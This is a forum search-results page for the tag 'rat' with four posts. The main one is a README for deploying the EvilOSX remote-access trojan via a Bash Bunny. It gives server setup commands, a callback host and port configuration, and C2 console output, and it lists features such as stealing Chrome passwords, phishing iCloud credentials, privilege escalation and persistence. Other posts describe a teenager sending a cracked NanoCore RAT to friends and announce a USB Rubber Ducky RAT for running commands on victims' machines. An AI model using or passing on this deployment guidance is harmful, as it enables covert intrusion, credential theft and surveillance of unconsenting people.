Search the Community
Showing results for tags 'rat'.
Found 4 results
Please check git for the latest README/code https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX untitled_EVILOSX + ______ _ _ ____ _____ __ __ + | ____| (_)| | / __ \ / ____|\ \ / / + | |__ __ __ _ | || | | || (___ \ V / + | __|\ \ / /| || || | | | \___ \ > < + | |____\ V / | || || |__| | ____) | / . \ + |______|\_/ |_||_| \____/ |_____/ /_/ \_\\ + untitled_ bash bunny edition / stekole ** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. ** ** Accessing a computer system or network without authorization or explicit permission is illegal. ** Features Client reconnects automatically/persistence ECM_ETHERNET and HID attack Emulate a simple terminal instance. Sockets are encrypted with CSR via OpenSSL. No dependencies (pure python). Retrieve Chrome passwords. Retrieve iCloud contacts. Attempt to get iCloud password via phishing. Show local iOS backups. Download and upload files. Retrieve find my iphone devices. Attempt to get root via local privilege escalation (<= 10.10.5). Auto installer Configuration Server To prep your server you will need to download and follow the install instructions from EVILOSX. On your server, download the EvilOSX code and run your server. git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX ./Server and type your listening port (1337) Client Before you deploy your bash bunny, update your configuration in the EvilOSX.py file At the bottom of the file you will see a server and port variable Set these to your server IP and listening port ######################### SERVER_HOST = "10.99.99.16" SERVER_PORT = 1337 ######################### Usage Plug in your bash bunny and wait until the script has finished running. You should see the client connect to the server root@kali:~/git/EvilOSX# ./Server.py ______ _ _ ____ _____ __ __ | ____| (_)| | / __ \ / ____|\ \ / / | |__ __ __ _ | || | | || (___ \ V / | __|\ \ / /| || || | | | \___ \ > < | |____\ V / | || || |__| | ____) | / . \ |______|\_/ |_||_| \____/ |_____/ /_/ \_\ [?] Port to listen on: 1337 [I] Type "help" to get a list of available commands. > help help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. exit - Close the server and exit. > clients [I] 1 client(s) available: 0 = client_hostname > connect 0 [I] Connected to "client_hostname", ready to send commands. Some of the other features can be found in the help menu. I have not tried them all help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. get_info - Show basic information about the client. get_root - Attempt to get root via local privilege escalation. download <path> - Downloads the file to the local machine. upload <path> - Uploads the file to the remote machine. chrome_passwords - Retrieve Chrome passwords. icloud_contacts - Retrieve iCloud contacts. icloud_phish - Attempt to get iCloud password via phishing. itunes_backups - Show the user's local iOS backups. find_my_iphone - Retrieve find my iphone devices. screenshot - Takes a screenshot of the client. kill_client - Brutally kill the client (removes the server). exit - Exits the session. Any other command will be executed on the connected client. Removal of Tool The python script gets added to users ~/Library/ directory - and startup file is added to the ~/Library/LaunchAgents directory rm -rf ~/Library/Containers/.EvilOSX/ launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist Defence disable the command-space short key for spotlight or disable spotlight all together if not needed Todo Issues I ran into a few issues with the "Build" of the python script. If the default one in this payload doesnt work, regenerate a new EvilOSX.py Run ./BUILDER and enter the appropriate information: After, copy this to your switch payload Thanks @Marten4n6 [YOURMOM](Check my room)
So this is basically an update to my post here: I didn't know how the person got my RAT in the first place and how they got onto my computer. Now I know that it wasn't someone that got into my Computer because of the cracked version of the Rat-Program - even though there was a silent monero miner in it - but it was someone that got my file from VirusTotal. It's a site where you can scan files and see which out of like 50 antiviruses detect it. I didn't know that they distribute the files and that you can straightly DOWNLOAD them from the site. So someone was probably running a bot on a Virtual Machine, that downloads all files that get flagged as a rat by the antivirus programs on VirusTotal and download them. I remember that I once saw a video on YouTube where someone was able to get into the machine of someone that tried to RAT him by using the file of that person. So is there a way that someone used my file to get into my computer? What are they able to do with it? Thanks for any answers ;) PS: From now on, if I have to use a online virus scanner, I'm using nodistribute ^^
Hello, something really weird happened to me yesterday. I created a RAT that I encrypted in a WinRar File and wanted to troll some of my friends with. I send the file in the chat of my discord server (similar to Teamspeak) and before that tested it on virustotal.com and a similar site. No one downloaded it (unfortunately ^^), but a few hours later (when none of the people that were on the discord were online) anymore, I saw a connection coming in. I used a cracked version of NanoCore that I got from some hacking forum (it was created by Alcatraz3222 and thousands of people downloaded it). The Computer had an IP from the USA (doesn't have to be true, it show that I'm from England even tho I have a German IP) and had no Antivirus installed. The name of it was something with a C at the beginning, and a y and an o (don't remember it exactly). I wanted to know who that was and opened the windows to the screen. He had some old version of Windows installed which I didn't know (its the one with the gray taskbar, pretty basic). There was a command prompt running, which had a python logo and was named "clock". I don't remember what was in it, but it was testing for something the whole time and once said something about "found" and "terminated". The only other thing I saw was Wireshark on the desktop. A few seconds after that, he disappeared from my client list. I didn't use any protection like VPN or a firewall at that moment. After that, I got really scared for some reason and turned off my computer. Does someone know how he got on my list and what he was doing? Maybe I'm getting ratted and he wanted to see what that file was, or a discord server ran the file? I really need your help ;) Cheers, contrix_ PS: Sry for my bad English, I'm German and just 14 years old as you probably already assumed by my writing ^^ PPS: While writing this text I overwrote my text two times, even tho I don't think I touched the insert button. I'm getting really paranoid xD
Hi, Hak5Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky. Here is the GitHub Link: https://github.com/untitledusername/duckyRAT GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line) This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below. Edit: I'm working on adding features to take screenshots of victim's desktop, webcam, etc. Thanks everybody, enjoy! - untitled ❤